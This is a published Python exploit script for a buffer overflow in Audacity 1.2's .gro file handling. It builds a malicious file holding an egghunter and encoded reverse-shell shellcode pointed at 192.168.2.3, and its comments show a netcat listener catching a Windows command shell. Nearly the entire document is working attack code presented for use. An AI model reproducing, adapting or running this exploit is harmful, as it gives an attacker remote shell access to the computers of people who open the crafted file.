audacity12-overflow.txt
Posted on 25 August 2009
#!/usr/bin/env python # # Audacity <= 1.2 .gro universal buffer overflow exploit # Author: mr_me # Download: http://audacity.sourceforge.net/download/ # Tested on Wind0ws XP sp3 & Vist@ # # Greetz fly to Muts and the offensive-security team # also to my wonderful partner Vanessa F for putting up with me :P # http://www.offensive-security.com/information-security-training.php # # Original: www.milw0rm.com/exploits/7634 ################################################# # # samurai@mrme:~$ nc -lvp 4444 # listening on [any] 4444 ... # 192.168.2.3: inverse host lookup failed: Unknown server error : # Connection timed out # connect to [192.168.2.3] from (UNKNOWN) [192.168.2.3] 55164 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Program FilesAudacity> print " [+] Creating eviL .gro file..." buff = ("x44" * 174) buff += ("xEBx08x90x90") buff += ("x22x23x17x01") buff += "x90"* 4 buff += ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8" "x57x30x30x54" # this is the egg... "x8BxFAxAFx75xEAxAFx75xE7xFFxE7") buff += ("xCC" * 1000); buff += "W00TW00T" # Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space) buff += ("x89xe5xd9xc3xd9x75xf4x5fx57x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x4bx4cx43x5ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b" "x4fx4bx4fx45x30x4cx4bx42x4cx46x44x47x54x4cx4b" "x47x35x47x4cx4cx4bx43x4cx45x55x44x38x45x51x4a" "x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51" "x4ax4bx50x49x4cx4bx50x34x4cx4bx43x31x4ax4ex50" "x31x49x50x4dx49x4ex4cx4dx54x49x50x44x34x44x47" "x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44x47" "x4bx50x54x47x54x46x48x44x35x4bx55x4cx4bx51x4f" "x51x34x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4c" "x4bx51x4fx45x4cx43x31x4ax4bx45x53x46x4cx4cx4b" "x4dx59x42x4cx51x34x45x4cx45x31x49x53x46x51x49" "x4bx45x34x4cx4bx47x33x50x30x4cx4bx51x50x44x4c" "x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x45x58x51" "x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f" "x4ex36x43x56x50x53x45x36x42x48x46x53x50x32x45" "x38x43x47x44x33x46x52x51x4fx51x44x4bx4fx48x50" "x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx4e" "x36x51x4fx4cx49x4ax45x45x36x4bx31x4ax4dx44x48" "x45x52x46x35x42x4ax44x42x4bx4fx48x50x45x38x4e" "x39x45x59x4cx35x4ex4dx51x47x4bx4fx49x46x46x33" "x51x43x51x43x51x43x50x43x51x43x47x33x51x43x4b" "x4fx4ex30x42x48x49x50x49x38x45x52x45x53x42x46" "x42x48x44x51x51x4cx43x56x50x53x4bx39x4dx31x4d" "x45x43x58x4ax4cx4cx39x4ex4ax43x50x51x47x4bx4f" "x4ex36x42x4ax42x30x46x31x46x35x4bx4fx48x50x42" "x46x43x5ax42x44x43x56x42x48x45x33x42x4dx42x4a" "x46x30x50x59x46x49x48x4cx4bx39x4ax47x43x5ax47" "x34x4dx59x4bx52x50x31x49x50x4ax53x4ex4ax4ax35" "x4dx59x4bx4dx4bx4ex50x42x46x4dx4bx4ex50x42x46" "x4cx4cx4dx42x5ax47x48x4ex4bx4ex4bx4ex4bx45x38" "x42x52x4bx4ex48x33x42x36x4bx4fx42x55x47x58x4b" "x4fx49x46x51x4bx51x47x51x42x46x31x50x51x46x31" "x42x4ax43x31x50x51x50x51x51x45x50x51x4bx4fx4e" "x30x42x48x4ex4dx4ex39x43x35x48x4ex51x43x4bx4f" "x48x56x42x4ax4bx4fx4bx4fx47x47x4bx4fx4ex30x42" "x48x4dx37x43x49x48x46x43x49x4bx4fx42x55x44x44" "x4bx4fx49x46x4bx4fx43x47x4bx4cx4bx4fx4ex30x43" "x58x4ax50x4cx4ax45x54x51x4fx50x53x4bx4fx4ex36" "x4bx4fx48x50x44x4ax41x41") file = open('mr_mes_eviL.gro','w'); file.write(buff); file.close(); print " [+] mr_mes_eviL.gro File created successfully. :)"
